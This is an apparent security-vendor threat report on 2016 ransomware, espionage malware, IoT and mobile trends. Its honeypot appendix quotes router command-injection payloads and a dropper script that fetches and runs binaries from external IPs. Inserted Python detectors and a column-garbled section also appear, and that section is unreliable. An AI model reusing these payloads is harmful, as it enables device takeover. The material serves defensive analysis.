Many people don't have the needed resources to buy Bitcoins online. Credit is required, and there are plenty of people with insufficient credit. For them, a physical Bitcoin ATM or brick-and-mortar retailer is required.

We should be thankful that there are at least some practical barriers to purchase Bitcoins. If it were any easier to do so, very little else would check the growth of crypto-ransomware's business model. The malware technology to encrypt data has been possible for many, many years; the bigger challenge has always been getting paid.

In the past, cyber crime schemes (such as scareware) have been killed off by disrupting the money supply. The same may well be true of cyber extortion; to kill the business model, it may be necessary to ban Bitcoin.

Further reading: Evaluating the Customer Journey of Crypto-Ransomware

Sean Sullivan
Security Advisor
@5ean5ullivan
GUEST ARTICLE
What we are doing right
Martijn Grooten

DESPITE having a strong interest in current affairs, the only two Finnish politicians I can name, I know for the things they have done in and for other countries. The reason that Finland rarely makes the news isn't that people don't care about the Land of a Thousand Lakes; it's that things in Finland are generally OK.

The same is true in security. Every day, one hears stories of nation states being hacked, websites being taken down through DDoS attacks and businesses being brought to a standstill due to ransomware. These are the stories that motivate any security professional to work hard to make things better.

That shouldn't stop us from appreciating how many things we are doing right though. Take ransomware, for example, rightly seen by many as the biggest security plague of the moment. Sure, it does affect many individuals and businesses and the stories of libraries being shut down or parents losing all their children's photos don't make for happy reading.

But that is only half of the picture. A recent IBM study showed that a little over half of businesses said they had never been affected by ransomware. Given the opportunistic nature of ransomware, where millions of infection attempts are being made every day, this doesn't mean those businesses were just lucky. Rather, it showed they did something right.

Unfortunately, especially for the other half of the picture, there is no silver bullet. There is no one thing that makes you invincible to ransomware, just like there isn't such a thing for any kind of online attack. But there are many things businesses, organisations and individuals can do to mitigate the threat and to seriously decrease the chances of being hit.

Keeping regular backups is a good and important thing to do, as is making sure your software is always patched. Removing unnecessary software and plugins helps a great deal, and of course the usual advice about clicking links and opening attachments applies too.

And then there is security software. Because despite all our good intentions, there's always this one device we didn't back up, this plugin that is slightly out of date and that email that really did look important. It would be wrong and dangerous to consider security software as a simple solution that could be replaced by following good practices. As Virus Bulletin and other testers have repeatedly shown, many of these solutions improve security quite a bit, and seriously reduce one's chances of being faced with that feared pop-up asking for a ransom.

So while we should continue to talk about what went wrong, let's also focus on what we are doing right. Because that can improve security for everyone.

Martijn Grooten
Editor, Security Researcher
Virus Bulletin
TODAY'S APTS ARE TOMORROW'S OPPORTUNISTS

NAN HAI SHU 49
BEYOND THE NATION STATE 51

Sophisticated cyber attacks tend to start at the top and work their way down. As the TTPs used in such attacks are made available to the public, less-organized actors take them into use. In many cases, it's manufacturers that are being hit - most likely because of lax cyber security practices. What's interesting about these attacks is that they aren't strictly targeted. They're opportunistic. The actors behind these types of operations perform wide-sweeping scans of the Internet, looking for systems with known, easily-exploitable vulnerabilities. This modus operandi is highly effective.

Advice from the field

Our Cyber Security Services consultants were involved in many incident response and threat assessment gigs during 2016. Here's what they had to say about the common attack and lateral movement vectors they encountered in the field.

Based on our Red Teaming exercises, phishing still works terrifyingly well. One of the most effective techniques was to email a victim a link to a fake website using a typo-squatted domain. Since well-tuned spam filtering, security gateway products, and endpoint protection technologies are able to easily block malicious attachments, focusing on social engineering provides the best results. Advanced attack techniques to bypass these security products are possible, and we've done that as well.

Sometimes physical access to the target location and penetrating the network from inside is the way to go. Lock manipulation to get access to a building is a technique we've learned to embrace. Layered security is just not a security meme from ye olden times, it's actually something worth implementing. But to do that, you need to plan carefully in order to eliminate potential conduits that can pierce all the layers.

Living off the land by using built-in Windows WMIC and PowerShell capabilities, and related attack frameworks, is something used by both legitimate offensive security professionals and online criminals. During 2016, we investigated breaches where the attacker had used Metasploit very extensively and pivoted throughout the environment with its built-in tools. Performing forensics in this kind of scenario is challenging, but most definitely doable with the right skills and tools.

Vulnerable hosts directly connected to the Internet were still juicy targets during 2016. We also saw our fair share of ransomware incidents, and plenty of phishing. Cyber bullying is an unfortunate and very sensitive topic in corporate environments. We were involved in a handful of such investigations, in addition to the more typical malicious insider incidents.

While it is true that nation-state actors have exciting capabilities also in offensive security, we feel that many of the more exotic mechanisms are somewhat overhyped. The focus of organizations should be to first master the basics of information security - prevention, detection and response. For example, in many companies we worked with, the core components of a network were left unmonitored, and hence they got breached without even noticing. We feel it's important to at least start monitoring internal network or SSO usage, carefully log resource access to common services, and put systems in place to look for anomalous traffic patterns.

Traditional techniques executed well still work - if you feel your current monitoring capabilities are up to scratch, then it makes sense to reach for the next level. Traditional information security is very much alive in 2017 and is an enabler for cyber security activities.
Nan HAI SHU

WHENEVER there are high-stake political and economic matters playing out on the world stage, it's safe to assume that some form of espionage is taking place in the background. And cyber espionage is cost-effective and difficult to attribute. So said our Cyber Security Advisor Erka Koivunen to Motherboard back in August.

This intersection of geopolitical events with the cyber world could be the banner for 2016.

Perhaps the biggest cyber news of the year came in conjunction with the US elections. Allegations of Russian hacking into the Democratic party in an effort to influence the election outcome made waves and raised real concerns.

Another politically charged rivalry with a cyber dimension took place on the other side of the world. Digital espionage rose to the surface last year in the ongoing dispute over territorial rights in the South China Sea. F-Secure researchers uncovered and investigated a malware strain targeting organizations who had one thing in common: they all played a role in an arbitration case filed by the Philippines against China.

Multiple samples of the malware (which F-Secure researchers dubbed NanHaiShu) had been seen in the wild for a couple of years, but one particular subset appeared to have been tasked with intelligence-gathering in the Philippines v. China case. The malware arrived via spearphishing emails with an attached VBA macro file that executed an embedded JScript file.

Three of the notable targets included the Department of Justice of the Philippines; organizers of the Asia-Pacific Economic Cooperation (APEC) Summit that took place in the Philippines in November 2015, where the case had been expected to be discussed; and a major international law firm representing one of the parties.

It was evident that the threat actors had done careful research beforehand to ensure their campaign would be successful. The carefully drafted email text used industry-specific lingo and referenced timely topics to reel in their targets. The attackers had also done enough reconnaissance to know the recipients were in a position to be able to disable macro warnings on Microsoft Office products.

Samples seen in the wild

December 2014: Permanent Court of Arbitration announcement on the Philippines-China arbitration case
January 2015: DOJ Staff bonus January 13, 2015.xls
March 2015: The draft Foley Hoag reform of the distribution of shares and renumeration system.xls
March 15, 2015: Deadline for the Philippines to submit supplemental arguments
May 2015: Salary and Bonus Data.xls
June 16, 2015: Deadline for China to submit response
October 2015: News on US ships movement
October 2015: C&C servers switch IP address
October/November 2015: AELM Entertainment budget and Attendance allowance.xls
November 2015: APEC summit takes place in the Philippines
Nan HAI SHU

Without knowing this beforehand, the attackers would be risking an expensive campaign that would yield no results.

The evident goal? To gain visibility into the legal proceedings surrounding the Philippines-China case. The timing of samples seen in the wild correlated with news events related to the case.

The malware payload was a Remote Access Trojan (RAT) which, once installed, sends information from the infected machine to a remote C&C server, for which they used dynamic DNS providers. It can execute additional JScript and VBScript code, and not only that, it can download any file the attacker pleases.

Who was responsible? Technical analysis indicated an orientation towards code and infrastructure associated with developers in mainland China. But more importantly, the selection of organizations targeted for infiltration are directly relevant to topics that are of strategic national interest to the Chinese government.

Macro malware, which began surging again in 2015 after a long decline since the early 2000s, still presents a concern. Organizations should disable automatic execution of macro code as an enforced policy for Microsoft Office.

The judgment in the Philippines v. China case was handed down by an independent tribunal in July 2016, in favor of the Philippines. Unsurprisingly, China quickly rejected the ruling. With new presidents at the helms of both the US and Philippines, both of whom may have completely different approaches to the entire debate, what happens next is anyone's guess. But it's safe to say that the South China Sea dispute hasn't seen its last cyber incident.

More information can be found in our whitepaper NanHaiShu: RATing the South China Sea, and recommendations in our threat intelligence brief.
Beyond The Nation State
DURING the latter half of 2010, details turned their gaze toward industrial control
emerged on the Stuxnet sabotage operation, systems.
the first widely publicized cyber attack on In 2014, researchers from our Threat
physical infrastructure. As the world came to Intelligence team looked into one of the
the realization of what future cyber attacks command and control servers that formed
might look like, security researchers around part of the Havex malware infrastructure. The
the world started digging into the details in campaign behind the Havex trojan, dubbed
order to learn how feasible it might be to Dragonfly or Energetic Bear, were at the
replicate such an attack. And it didnt take time known to be performing data collection
them long to realize that industrial control (espionage) activities in Europe and the
systems, and the infrastructure around US, and were suspected to be operating
them, are both heavily insecure and easily with nation-state support. Our researchers
exploitable. What also became quickly noted that multiple trojanized ICS controller
obvious was that these decades-old systems software installers had been found on the
and technologies wouldnt and couldnt be C&C in question (Windows-based software
updated overnight. A whole new window for used to control ICS systems, not the firmware
attack opened up to the world. actually installed on the devices themselves).
It goes without saying that, less than a decade Further investigation revealed that this group
later, that window still very much exists. had managed to place the same trojanized
But whereas a handful of years ago it took packages directly onto vendor download
the resources and tools of a nation state to sites, where unsuspecting victims would
execute such an operation, some of those download and install them. Given that the
same capabilities are in the hands of todays Dragonfly group were only known to carry
everyday cyber crime groups. Stuxnet was the out espionage-related activities, the groups
catalyzing moment in which criminal gangs motives for using these trojanized installers
were unclear (at the time).
Page 51
Beyond The Nation State
Pay
see attacks trickling down from defense contractors
to banks to critical infrastructure to heavy industry
and eventually to everyone else (manufacturing,
retail, SMEs, etc.). And we usually see these trends
Page 53
ON THE MALWARE FRONT

EXPLOIT KIT TRENDS 55
NOTABLE MALWARE 2016 56
SECURITY FACTS AT A GLANCE (GUEST ARTICLE, AV-TEST) 57
MACRO MALWARE 60

[Figure: Exploit kit trends, activity by week in 2016 with panels labelled Magnitude EK, Rig EK and Locky ransomware, against a 2013 to 2016 baseline.]
Notable Malware LOCKY
Locky encrypts files and renames them
with the .locky extension. It will then
2016
provide detailed instructions on how
to make the ransom payment. It usually
arrives onto a system via spam emails,
but has also been found circulating via
malicious images uploaded on Facebook
and LinkedIn accounts.
CERBER
Cerber spares its attack if the victims appear to be located in Central Asian countries. For the rest, it will proceed to encrypt their files and display a ransom note instructing the victims to follow the next steps. Cerber is distributed via exploit kits planted on websites.

Ransomware attacks made a number of headlines in cyber security news last year, claiming victims from the average home user to more lucrative targets such as hospitals and police departments. Ransomware capitalizes on the victim's fear of losing their valuable possessions, i.e. data, files, or machines. It takes these items hostage by encrypting them and then demanding a ransom in exchange for the decryption key.

Ransomware typically infiltrates a system through malicious documents attached in spam emails and exploit kits planted on dubious websites. These documents often serve as a downloader or a dropper that will fetch the ransomware once its payload is triggered. To trigger the payload, an action from the victim's side is required; this is achieved by employing social engineering tactics. Popular tactics include tricking victims into enabling macros in Microsoft Office documents, and prompting victims into clicking on a button.

PETYA
Unlike other crypto-ransomware, Petya encrypts the system's Master Boot Record (MBR) instead of files. It then forces the system to restart and displays a ransom demand page featuring a white skull on a red background. Petya is distributed via spam emails containing

MACRO MALWARE
Macro malware is nothing new but it made a strong comeback in 2016, which saw a surge in malware taking advantage of the macro feature in Microsoft Office documents.

A macro is basically a set of instructions that can be useful for automating tasks. In Microsoft Office documents, users can create a macro that suits their need either by using the simplified graphical user interface (GUI) or by coding it from scratch in Visual Basic for Applications (VBA).

While useful, a macro also poses security risks. It allows malware to hide within a seemingly harmless document and tricks the victims into executing malicious code. In a common attack scenario, the victim receives a document attached to an email. When opened, the contents of the document seem to be blocked and can only be viewed by enabling the macro. By enabling the macro, the victim inadvertently executes the malware's code.
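A mail gateway or sandbox can check for the hiding place the macro-malware section describes before a user ever sees the "enable content" bar. The following is an added example, not code from the report or from F-Secure: it opens an OOXML (.docx/.docm-style) container, looks for the embedded VBA project, and flags a macro carried under an extension that should not have one. The file names and the minimal sample container are constructed for the test; the part name and content type are the ones Office itself uses.

```python
import io
import re
import zipfile

# Part name Office uses for the compiled VBA project inside an OOXML zip.
VBA_PART_RE = re.compile(r"(^|/)vbaProject\.bin$", re.IGNORECASE)
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Extensions that are allowed to carry macros.
MACRO_ENABLED_EXT = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
# Legacy binary-format extensions. Office still opens an OOXML zip saved
# under these names, which is why a renamed .docm -> .doc lure works.
LEGACY_EXT = {".doc", ".dot", ".xls", ".xlt", ".ppt", ".pot"}


def inspect_office_document(filename: str, data: bytes) -> dict:
    """Return macro indicators for an OOXML document held in memory."""
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    result = {"is_ooxml": False, "has_vba_project": False,
              "declares_vba_content_type": False,
              "extension_mismatch": False, "verdict": "clean"}
    if not data.startswith(b"PK\x03\x04"):
        # Not a zip container; legacy OLE2 files need a different parser.
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if "[Content_Types].xml" not in names:
                return result
            result["is_ooxml"] = True
            result["has_vba_project"] = any(VBA_PART_RE.search(n) for n in names)
            ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            result["declares_vba_content_type"] = VBA_CONTENT_TYPE in ctypes
    except zipfile.BadZipFile:
        return result
    has_macro = result["has_vba_project"] or result["declares_vba_content_type"]
    # A macro under a non-macro extension, or an OOXML zip disguised with a
    # legacy extension, is a mismatch worth stopping at the gateway.
    result["extension_mismatch"] = ((has_macro and ext not in MACRO_ENABLED_EXT)
                                    or ext in LEGACY_EXT)
    if has_macro and result["extension_mismatch"]:
        result["verdict"] = "block: macro in mismatched extension"
    elif has_macro:
        result["verdict"] = "review: macro-enabled document"
    elif result["extension_mismatch"]:
        result["verdict"] = "review: OOXML content under legacy extension"
    return result


def build_sample(with_vba: bool) -> bytes:
    """Constructed minimal OOXML container for testing (not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        ct = ['<?xml version="1.0"?>'
              '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
              '<Default Extension="xml" ContentType="application/xml"/>']
        if with_vba:
            ct.append('<Override PartName="/word/vbaProject.bin" '
                      'ContentType="application/vnd.ms-office.vbaProject"/>')
            zf.writestr("word/vbaProject.bin", b"\x00constructed-placeholder")
        ct.append("</Types>")
        zf.writestr("[Content_Types].xml", "".join(ct))
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    for name, vba in (("invoice.docm", True), ("invoice.doc", True), ("memo.docx", False)):
        print(name, inspect_office_document(name, build_sample(vba))["verdict"])
```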
BANKING TROJAN
Security Facts: GUEST ARTICLE
Olaf Pursche

CYBER CRIMINALS think like business people. And the latest findings and report from AV-TEST leave no doubt that business is the main impetus for the constant development of new Internet threats for all existing device platforms. At the beginning of 2017 the AV-TEST database counted over 600,000,000 malware samples. 127,469,002 new malware programs were added to this database in 2016. This translates to an average rate of four to five new malware detections per second.

As a strategic target, Windows systems, not least due to their high prevalence, are of particular interest to criminal threats. In 2016, over 99% of all the attacks registered by the detection systems of AV-TEST were aimed at Microsoft's operating system. According to recorded figures for 2016, classic computer viruses represented the main group of malicious programs for Windows, accounting for almost half of all detections. They were followed by worms (over 35%), and trojans with over 20%. Although ransomware filled media headlines throughout last year, the overall appearance of this type of malicious program was relatively low in 2016. Only about one percent of total malware were crypto-trojans. The enormous amount of attention the media pays to these malicious programs is partially justified by their most unusual characteristic: while most types of malware try to remain unidentified on infected systems for as long as possible, ransomware explicitly reveals itself to victims. Shocking users with this revelation is strategic, as it increases the probability that the victim will pay the ransom.

[Chart: Number of newly discovered and registered malware samples, pre-2010 through 2016, on a scale of 0 to 600,000,000. Source: AV-TEST Institute (www.av-test.org)]

There are over 19 million malware programs developed especially for Android, making Google's mobile operating system the main target for mobile malware. The reason for this is the vast distribution of Android devices, as well as the relatively open system for the distribution of apps. And consequently, over 99% of all malware programs that target mobile devices are designed for Android devices. As AV-TEST's numbers show, the majority of the malicious programs for Android are classic trojans. But the full spectrum of malware is present, and we see viruses, worms, malicious scripts, backdoors, and special trojans like ransomware targeting mobile devices. In this light, the malware situation for Android devices is following a similar development cycle to what we've already seen with Windows PCs. This is no surprise. Practically every application, from email to online banking, which just a few years ago had to be completed on a PC, now conveniently functions on a mobile device via corresponding apps. Lately, the use of specialized trojans appears to be especially lucrative for criminals.

Security Facts at a Glance

[Chart: Number of Malicious Android Apps in AV-TEST's Database, showing the total number of Android samples (0 to 20,000,000) and new Android samples per month, Jan 2013 to Dec 2016. * Dec 2016 data is partial]

AV-TEST's experts design and build our own custom automation systems to collect, register, analyze, and classify malware. And thanks to the effective use of automation, one of the world's largest databases for malware programs is expanding. Its data volume has been growing continuously for more than 15 years on over 250 servers with a storage capacity of over 2,200 TB. It enables the controlled launch of potential malware so researchers can analyze and classify them. The system automatically records and tests 1,000,000 spam messages, 500,000 URLs, 500,000 potentially harmful files, 100,000 innocuous Windows files, and 10,000 Android apps every day. With these proprietary tools, the AV-TEST Institute is home to one of the world's most comprehensive data pools for measuring and classifying malware code, and its proliferation in the wild.

AV-TEST GmbH is the leading supplier of services in the fields of IT Security and Antivirus Research, focusing on the detection and analysis of the latest malicious software. The AV-TEST Institute's results provide an exclusive basis of information helping vendors to optimize their products, magazines to publish research data, and end users to make product choices.

Olaf Pursche
Head of Communications
AV-TEST Institute
[Charts: new malware samples per month, 2005 to 2017* (0 to 14,000,000; * Jan 2017 data is partial), and the share of samples by platform: Windows 67%, Script 19%, Android 8%, DOS 0%, with Linux, Mac OS and Mobile also shown]
Mobile OS Takeup At A Glance

[Charts: share of the iOS user base on iOS 10.2 for December 1st half, December 2nd half and January 1st half (0% to 100%); share of Android devices on 7 Nougat, 6 Marshmallow, 5 Lollipop and 4 (all versions) for October, November and December (0% to 100%). Pull quote: iOS 10.2 was taken up by more than half of the iOS user base in just one month]

APPLYING the most recent security updates to your device's operating system is a best practice security fundamental. If your device isn't running the latest version of an operating system, it's likely vulnerable to some known exploits. Data from F-Secure Freedome analytics show that Apple's iOS distribution and upgrade model is far superior to Android's. While upgrades are actively pushed to iOS devices (even older ones), Android devices are only pushed updates if the device's manufacturer goes to the trouble of preparing them. And they often don't.

The above graphs show that iOS 10.2 was taken up by more than half of the iOS user base in just one month. These numbers reflect those that Apple make publicly available. On the other hand, Android 7, Nougat, which had been on the market for four months prior to these figures being collected, had a measly 1% uptake rate. Marshmallow (Android 6) is at this point still gaining market share faster than Nougat. Older versions of Android, notably versions 4 and 5, continue to dominate Android's market share. Devices with these operating systems pre-installed were likely purchased between 2011 and 2015. This all adds up to great news for attackers, who can rely on the fact that large numbers of vulnerable Android devices exist in the wild.

On the next page, you'll see a breakdown of Android operating system versions by region. It illustrates how more affluent countries tend to replace devices more often, since it's unlikely you'll see a device from more than two years ago running Android versions 6 or 7.
Mobile OS Takeup At A Glance

[Chart: share of Android devices per country on 7 Nougat, 6 Marshmallow, 5 Lollipop and 4 (all versions), 0% to 100%, for 43 countries from Indonesia (lowest share of versions 6 and 7) to Norway (highest). Pull quote: large numbers of vulnerable Android devices exist in the wild]

Client telemetry from F-Secure Freedome shows that the takeup rate of new Android versions varies greatly between countries. The graph is sorted by the rate of version 6 and 7 devices and excludes countries with an insufficient number of users.
LOOKING FORWARD

Why there's no S in IoT

THE PHENOMENAL growth in the number of connected devices in the form of the Internet of Things may be the best argument we've had in a long time for regulating technical cyber security. Minus the glorified adverts, IoT devices are merely household objects turned into science fiction props with the help of unpatched Linux.

Large-scale DDoS attacks set new records in 2016. But this time, a discernible chunk of attack traffic was sourced not from malware-infected computers but from internet-connected household appliances, flat screen televisions, baby monitors, and residential building automation. Most devices were running Telnet and accepting default passwords from the Internet. Yes, Telnet in 2016. Your fridge hit the IoT party wearing a 90s outfit.

2016 was the year television sets started watching their watchers and consumers began bringing gadgets they could speak with into their homes. Consumers, trusting these new devices with their credit card details, were surprised when their gadgets went on shopping sprees after a random person on television made a remark about buying something. A growing number of gadgets, rendered useless because their services had been discontinued just months after their release, joined the huge pile of mobile phones and tablets abandoned by their manufacturers. When support ends, the gadgets stop pretending they care for you.

In 2016 the FTC, the US federal consumer protection regulator, successfully tested its ability to regulate technology vendors' proficiency in cyber security. In landmark rulings, Oracle, Asus and D-Link were all found lacking in their cyber security posture and were penalized for marketing their products as secure while, in reality, they weren't. While consumers have reason to be jubilant over the ruling, there's a catch. The FTC was successful in these cases not because it has the mandate to regulate the minimum level of technical cyber security, but because the vendors
Beyond The Horizon

THERE ARE a few facts about computer infrastructure that can be solidly extrapolated into the future. Storage density will increase, network speeds will increase, devices will become more powerful and use less energy, and batteries will improve. And the improvements will increase more dramatically as time passes. An off-the-shelf computer in 1990 came with megabytes of disk space. The equivalent computer today comes with terabytes. In 25 years, we've seen storage increase by a factor of almost a million.

Right now, different people define the Internet in different ways. While some people see it as the web, others may see it as apps, the cloud, IoT, chat, or streaming video. In the near future, people may define the Internet by the AI chat bots they're interacting with, or an overlay on their everyday life provided by augmented reality.

The way devices talk to each other will change a lot. And thus, the Internet will not resemble what we know today. We're already seeing changes in this direction. Phones are solely connected to the Internet via 4G. WiFi connections are available almost everywhere, and are appearing in places they didn't used to, such as on planes. Down the road, your IoT washing machine won't connect to the Internet via your home WiFi as it does today - it'll connect directly to an operator's network using a zero-rated low-energy, low-bandwidth, high-latency connection for the purposes of upstreaming telemetry once a week. Other IoT devices will probably do the same thing. You'll no longer have control over whether these devices are online or not.

On the business side, I expect corporate intranets to become a thing of the past. Services you're accessing from your company's internal network right now will move to the cloud. Printers will probably be the last reason you'll need to connect to a corporate LAN.

The complexity of interconnected devices today is causing us to struggle with their security. But we're just at the beginning of that struggle. As an example, right now it's possible to perform a full scan of the IPv4 address space in a reasonable amount of time. It'll be impossible to scan the full IPv6 address space. Finding bad stuff on the Internet will be more difficult. But, at the same time, it'll be harder for attackers to trawl for weak or vulnerable infrastructure.

In the not-too-distant future, narrow artificial intelligence applications will power almost everything we interact with. We're already seeing narrow AI in our homes (Alexa), in our search results (Google), on our phones (Siri), in self-driving cars (Tesla), and even in toys (Anki). AI systems will pose their own security conundrums. We can find and fix vulnerabilities and bugs in the code we've written. Doing the same for emergent logic is a whole different process, and one that's not really been explored to any degree.

Computers have already morphed into handheld devices (phones and tablets) and are in the process of doing the same with wearables (watches, jewelry, and glasses). Expect that trend to continue as miniaturization, computing power, and battery technology all see incremental improvements. Wearables will morph into cybernetics such as ocular implants and neural interfaces.

Robotics will also benefit from advances in technology. The IoT of the future will include utility bots in all shapes and sizes, from large construction behemoths, to robotic laborers, to delivery drones, to nanorobots. And yes, all of these devices will run narrow AI and they'll all send and receive data.

These advances will change the way people consume data. We'll probably use a lot of augmented or even virtual reality in our everyday lives. Neural computing interfaces will allow us to download information locally and access it via thought. The way we communicate will change, too. We'll use the same neural interface to chat with people wirelessly, by thought. Almost like telepathy.

Changes in geopolitics will undoubtedly affect the way we approach cyber security. Our world may contain less separate geopolitical spaces, perhaps even just a single one. Or we may see isolationism give rise to a complete balkanization of the Internet. In the future, the world may work together to secure one globally available Internet. Or several separate geopolitical entities will be responsible for securing their own networks independently. And there are bound to be differences in how they approach that problem.

The way corporations operate and how they handle data confidentiality and security will change too. Data already has monetary value, and it will likely become an even more guarded resource in the future. The definition of intellectual property may be quite different down the road. All of this will shape how companies and individuals approach data security. For instance, the way access controls are implemented 50 years from now will be completely different from today.

Some trends will naturally improve security. Cloudification will continue to the point where every device is just a connected thin client. Operating systems will implement more built-in security, such as isolation and sandboxing. They'll work more like Android and iOS than Windows or MacOS. Data won't be stored on devices and applications won't be installed locally. Systems of the future will have extremely narrow attack surfaces. Getting at someone's data will be more about social engineering and scamming than about hacking into devices. Most data will be stored on servers. And encryption will be widespread and built into services, devices, and applications by default.

The Internet is evolving. And security will be one of the factors driving that evolution. Old, insecure technologies that aren't worth saving will die off and get replaced with new technologies built with security in mind. Stuff that's worth saving, but not yet up to scratch, will adapt. Survival of the fittest.

Computers and the Internet will undoubtedly evolve at an ever faster pace. But whether it be five, ten, or fifty years from now, we'll still be talking about security. It's just that the issues we'll face then will look completely different to the issues we're facing now.

Or strong AI will emerge, the singularity will happen, and all bets will be off.

Andy Patel
Cyber Gandalf
@r0zetta
APPENDICES

Honeypot Intel 68
NCSC-FI's Mirai Mitigation 71
Mirai Source Code Analysis 73
Appendix: Honeypot Intel
Krzysztof Marciniak
Python Developer
Cyber Security Services

Misconfigured FrontPage extensions

Scripted attacks like the following example appear to be going after misconfigured FrontPage extensions by creating a test document and testing for its existence.

> POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
> Accept: auth/sicily
> Cache-Control: no-cache
> Connection: close
> Content-Length: 194
> Content-Type: application/x-vermeer-urlencoded
> Host: [redacted]
> Mime-Version: 1.0
> User-Agent: core-project/1.0
> X-Vermeer-Content-Type: application/x-vermeer-urlencoded
> method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dcore%2ehtml%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false core-project
> GET /core.html HTTP/1.0
> Connection: close
> Host: [redacted]
> User-Agent: core-project/1.0

TRACE intel gathering

TRACE methods, such as the following example, are used to read HTTP headers that are otherwise blocked from JavaScript access.

> OPTIONS / HTTP/1.1
> Access-Control-Request-Method: TRACE
> Connection: close
> Host: [redacted]
> Origin: example.com
> User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)

Home router exploits

Here's an attack we've seen that attempts to perform cmd injection on hndUnblock.cgi as part of a Linksys E-Series router flaw exploit (unauthenticated remote code execution).

> POST /hndUnblock.cgi HTTP/1.0
> Accept: */*
> Content-Length: 396
> Content-Type: application/x-www-form-urlencoded
> Host: [redacted]
> User-Agent: Wget(linux)
>
> submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%33%31%2E%31%34%38%2E%32%32%30%2E%33%33%3A%38%30%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=

The decoded data looks like this:

bash cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh http://31.148.220.33:80/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh

The above command is designed to download and run a MIPS executable on the targeted hardware. Similar examples actually use a string of GET requests. Here's an example:

> GET /%3Bchmod$IFS%27777%27$IFS%27/tmp/nmbt2.sh%27
> GET /%3Brm$IFS-f$IFS%27/tmp/nmbt2.sh%27
> GET /%3Bsh$IFS-c$IFS%27/tmp/nmbt2.sh%27
> GET /%3Bwget$IFS-O$IFS%27/tmp/nmbt2.sh%27$IFS%27http://198.101.14.103/nmbt2.sh%27
> GET /cgi/common.cgi
> GET /stssys.htm

When decoded, the commands look like this:

> GET /;wget$IFS-O$IFS/tmp/nmbt2.sh$IFS http://198.101.14.103/nmbt2.sh
> GET /;chmod$IFS777$IFS/tmp/nmbt2.sh
> GET /;sh$IFS-c$IFS/tmp/nmbt2.sh
> GET /;rm$IFS-f$IFS/tmp/nmbt2.sh

We got a hold of the nmbt2.sh script. Here's what it looks like:

#!/bin/sh
cd /tmp
rm -f .nttpd
wget -O .nttpd http://198.101.14.103/.nttpd,17-mips-be-t2
chmod +x .nttpd
./.nttpd
rm -f nmlt1.sh
wget -O nmlt1.sh http://198.101.14.103/nmlt1.sh
chmod +x nmlt1.sh
./nmlt1.sh
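The two obfuscation forms quoted above (percent-encoding with $IFS standing in for spaces in GET paths, and a fully percent-encoded command inside backticks in a POST body) decode the same way, and a honeypot or WAF log pipeline should normalise both before matching. The following is an added example, not code from the report or from F-Secure's honeypot tooling: it decodes until the text stops changing (to defeat double-encoding), expands $IFS, flags shell metacharacters and downloader keywords, and reconstructs the command chain from a burst of GET lines. The sample log lines and the 198.51.100.10 host are constructed for the test.

```python
import re
from urllib.parse import unquote

# Strings attackers use in place of whitespace where spaces are filtered.
SPACE_SUBSTITUTES = ("${IFS}", "$IFS")
# Words that indicate a downloader chain rather than an ordinary request.
DROPPER_WORDS = ("wget", "curl", "tftp", "chmod", "/tmp/", "sh -c", "busybox")
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+HTTP/[\d.]+)?$")

# Constructed sample log lines in the honeypot's "> " quoting style.
SAMPLE_LOG = [
    "> GET /%3Bwget$IFS-O$IFS%27/tmp/nmbt2.sh%27$IFS%27http://198.51.100.10/nmbt2.sh%27 HTTP/1.1",
    "> GET /%3Bchmod$IFS%27777%27$IFS%27/tmp/nmbt2.sh%27 HTTP/1.1",
    "> GET /%253Bsh$IFS-c$IFS%27/tmp/nmbt2.sh%27 HTTP/1.1",   # double-encoded ';'
    "> GET /index.html HTTP/1.1",
]


def normalise(text: str) -> str:
    """Percent-decode until a fixed point is reached, then expand $IFS."""
    prev = None
    cur = text
    while cur != prev:
        prev, cur = cur, unquote(cur)
    for sub in SPACE_SUBSTITUTES:
        cur = cur.replace(sub, " ")
    return cur


def classify_request(line: str) -> dict:
    """Decode one request line and report command-injection indicators."""
    m = REQUEST_RE.match(line.strip().lstrip("> "))
    if not m:
        return {"raw": line, "decoded": None, "injection": False, "indicators": []}
    decoded = normalise(m.group("target"))
    path = decoded.split("?", 1)[0]
    indicators = []
    # A ';', backtick or pipe inside the path component is never legitimate.
    if re.search(r"[;`|]", path):
        indicators.append("shell metachar in path")
    indicators += [w for w in DROPPER_WORDS if w in decoded]
    return {"raw": line, "decoded": decoded,
            "injection": bool(indicators), "indicators": indicators}


def extract_commands(lines) -> list:
    """Rebuild the shell command chain from a burst of injected GET lines."""
    commands = []
    for line in lines:
        r = classify_request(line)
        if r["injection"] and r["decoded"].startswith("/;"):
            commands.append(r["decoded"][2:].strip())
    return commands


def decode_post_body(body: str) -> dict:
    """Decode a form body and pull out backtick-wrapped command substitutions."""
    decoded = normalise(body)
    return {"decoded": decoded, "commands": re.findall(r"`([^`]*)`", decoded)}


if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_LOG):
        print("injected:", cmd)
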